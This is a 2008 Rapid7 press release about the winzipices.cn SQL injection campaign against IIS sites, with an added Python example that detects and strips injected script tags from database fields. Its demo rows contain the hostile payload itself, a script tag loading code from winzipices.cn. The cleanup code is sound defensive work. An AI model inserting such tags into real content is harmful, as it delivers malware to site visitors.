Beth Bryant
BBWrites Strategic Communications
(508) 786-3013
BOSTON - May 13, 2008 - Rapid7, the leading provider of Unified Vulnerability Management (UVM) solutions for large enterprise deployments and small to medium businesses, announced today that NeXpose includes a check and a web crawl capability to detect and remediate the winzipices.cn vulnerability. Web sites hit by this SQL injection attack have their page contents modified to point to malware that is automatically downloaded by any visitor to the site. These sites are all vulnerable to SQL injection (or have recently been vulnerable) and were hacked by this automated hacker toolkit. In addition, by executing a Google search on the malware name, hackers can find sites that have already been exploited.
The winzipices.cn SQL injection attack aimed at Microsoft IIS web servers has hit over 500,000 websites, including the United Nations, UK Government sites and the U.S. Department of Homeland Security. To date, the attack continues to evolve and automatically affect new servers. The automated attack takes advantage of the fact that Microsoft’s IIS servers allow generic commands that don’t require specific table-level arguments. The vulnerability is the result of poor data handling by the sites' creators, rather than a specific Microsoft flaw. The attack itself injects malicious JavaScript code into every text field in the database; the JavaScript then loads an external script that can compromise a user’s PC.
According to Microsoft, there is no patch to fix the issue; the problem is with the developers who failed to follow well-established security practices for handling database input. Also, if your site has been affected, you’re going to need to restore your database from a clean backup copy and start reviewing your code to make sure all input is properly sanitized. To accomplish this, companies need to scan for the vulnerability.
The latest NeXpose update provides both a check to help locate the SQL injection vulnerability and the ability to crawl web sites to determine whether a site has been exploited. By crawling the website, companies can use NeXpose to identify and remove any malware injected by the attack. Leaving the exploit unnoticed and unfixed allows even the most junior hacker to find and exploit the corrupted site. Finding exploited web sites is as easy as executing a Google search for the malware name. Every web site that is affected will be listed in the Google search.
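As an added illustration of the detection and clean-up the release describes (this is example code written for this page, not Rapid7's or NeXpose's), the following Python scans every text column of a table for injected external <script> tags, reports the row, column and host, and strips them with a parameterised UPDATE. The table, rows and SQLite database are constructed for the demo; the hostname in the sample rows is the one named in the release.

```python
import re
import sqlite3

# Payload shape the release describes: a <script> tag whose src points at an
# external host; case-insensitive and tolerant of an unquoted src value.
INJECTED_SCRIPT = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//([^'\"\s/>]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE)

def text_columns(conn, table):
    """Names of the text-affinity columns of `table` (SQLite PRAGMA table_info)."""
    cols = []
    for _cid, name, decl, *_rest in conn.execute(f"PRAGMA table_info({table})"):
        decl = (decl or "").upper()
        if "CHAR" in decl or "TEXT" in decl or "CLOB" in decl:
            cols.append(name)
    return cols

def scan_table(conn, table):
    """Return (rowid, column, external host) for every injected script tag found."""
    findings = []
    for col in text_columns(conn, table):
        # Table/column names come from the schema, not user input; data values are bound.
        for rowid, value in conn.execute(f"SELECT rowid, {col} FROM {table}"):
            for m in INJECTED_SCRIPT.finditer(value or ""):
                findings.append((rowid, col, m.group(1).lower()))
    return findings

def clean_table(conn, table):
    """Strip injected tags in place; return the number of values rewritten. The UPDATE
    binds the new value with '?', the handling the release says vulnerable sites lacked."""
    rewritten = 0
    for col in text_columns(conn, table):
        for rowid, value in conn.execute(f"SELECT rowid, {col} FROM {table}").fetchall():
            cleaned = INJECTED_SCRIPT.sub("", value or "")
            if cleaned != (value or ""):
                conn.execute(f"UPDATE {table} SET {col} = ? WHERE rowid = ?", (cleaned, rowid))
                rewritten += 1
    conn.commit()
    return rewritten

def demo_db():
    """Constructed sample: a product table in which one row was hit by the injection."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name VARCHAR(80), blurb TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", [
        (1, "Widget", "A plain widget.", 9.99),
        (2, "Gadget<script src=http://winzipices.cn/1.js></script>",
         "Handy gadget.<script src=http://winzipices.cn/1.js></script>", 19.99),
    ])
    return conn
```

Cleaning the stored text only removes the symptom; the release's advice to restore from a clean backup and fix the input handling still applies.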
"This is a critical security issue for all companies using Microsoft IIS. Once an attacker has access to the underlying database via SQL injection, it is often possible for an attacker to escalate his privileges and attack the underlying operating system that hosts the database. These vulnerabilities open the door for hackers to easily access corporate networks and customer data," stated Tas Giakouminakis, CTO of Rapid7. "Because this is an automated SQL injection attack, the list of exploits will continue to grow. We expect the automated attack to continue to evolve and for more servers to be targeted in the coming weeks."
Rapid7 is the leading provider of Unified Vulnerability Management (UVM) solutions. Rapid7’s NeXpose UVM provides network, database and Web application vulnerability management for enterprise deployments and small-to-medium businesses. Since its introduction, NeXpose has been sold to corporate enterprises, Global 2000 companies, and government entities, and serves the full range of vertical markets across the U.S. and abroad. In addition, Rapid7 provides compliance products and services for PCI, HIPAA and Sarbanes-Oxley. Rapid7 is headquartered in Boston, MA, with an office in Los Angeles, California.